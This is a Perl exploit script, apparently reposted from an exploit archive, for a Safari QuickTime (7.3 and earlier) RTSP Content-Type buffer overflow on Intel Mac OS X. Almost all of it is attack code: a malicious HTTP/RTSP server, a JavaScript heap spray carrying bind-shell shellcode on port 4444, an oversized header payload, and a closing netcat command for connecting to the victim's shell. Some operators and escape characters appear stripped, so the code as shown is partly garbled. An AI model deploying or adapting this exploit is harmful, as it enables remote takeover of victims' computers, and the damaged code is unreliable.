Safari Quicktime

#!/usr/bin/perl

#

# quickbite.pl

#

# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit

# for Mac OS X (Intel)

#

# Tested with OS X 10.4.

# On victim, browse to http://server:8080/

# Binds shell on port 4444.

#

# by krafty

#

# greets to sk, halvar, grugq, and all the ethnical hackers

# extra thanks to ddz for osx hackery

# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc

# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.

# milw0rm and packetstorm rule

# Bring back the days of technotronic and r00tshell! Freedom.

#

# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:

# "What's worse than biting into an apple and finding a worm?"

# "Finding half a worm".

use Socket;

use IO::Handle;

use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

$buf = chr(0x11) x 6000;

# don't touch anything below this line

$html = <<ENDHTML;

<script>

var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");

var shellcode = unescape("$shellcode");

shellcode = prefix shellcode;

var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");

do {

spray = spray;

} while(spray.length < 0xc0000);

memory = new Array();

for(i = 0; i < 50; i )

memory[i] = spray shellcode;

var url = "rtsp://" location.host "/x.mp3";

document.write("<EMBED SRC='" url "' TYPE='video/quicktime' AUTOPLAY='true' />");

</script>

ENDHTML

$rtsp_body =

"v=0rn" .

"o=- 16689332712 1 IN IP4 0.0.0.0rn" .

"s=MPEG-1 or 2 Audiorn" .

"i=1.mp3rn" .

"t=0 0rn" .

"a=tool:hellorn" .

"a=type:broadcastrn" .

"a=control:*rn" .

"a=range:npt=0-213.077rn" .

"a=x-qt-text-nam:MPEG-1 or 2 Audiorn" .

"a=x-qt-text-inf:1.mp3rn" .

"m=audio 0 RTP/AVP 14rn" .

"c=IN IP4 0.0.0.0rn" .

"a=control:track1rn";

$content_length = length($rtsp_body);

$rtsp_header =

"RTSP/1.0 200 OKrn" .

"CSeq: 1rn" .

"Date: 0x00 :Prn" .

"Content-Base: rtsp://0.0.0.0/x.mp3/rn" .

"Content-Type: $bufrn" .

"Content-Length: $content_lengthrnrn";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OKnContent-type: text/htmlnn";

$| = 1;

my $port = MY_HTTP_PORT;

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";

setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";

my $my_addr = sockaddr_in($port,INADDR_ANY);

bind(SOCK,$my_addr) or die "bind() failed: $!";

listen(SOCK,SOMAXCONN) or die "listen() failed: $!";

warn "waiting for incoming connections on port $port...n";

$repeat = 1;

$victim = inet_aton("0.0.0.0");

while($repeat) {

next unless my $remote_addr = accept(SESSION,SOCK);

my ($port,$hisaddr) = sockaddr_in($remote_addr);

warn "Connection from [",inet_ntoa($hisaddr),",$port]n";

$victim = $hisaddr;

SESSION->autoflush(1);

$request = "";

while(<SESSION>) {

$request_line = $_;

$request .= $request_line;

chomp($request_line);

if($request_line =~ /DESCRIBE rtsp/) {

$repeat = 0;

}

$x = length($request_line);

if($x <= 1) {

last;

}

}

print STDERR $request;

if($repeat) {

print SESSION $http_header . $html;

}

else {

print SESSION $rtsp;

}

warn "Connection from [",inet_ntoa($hisaddr),",$port] finishedn";

close SESSION;

}

print "Connect to ".inet_ntoa($victim).":4444 after 5 secondsn";

print "nc -nvv ".inet_ntoa($victim)." 4444nEnjoy!n";
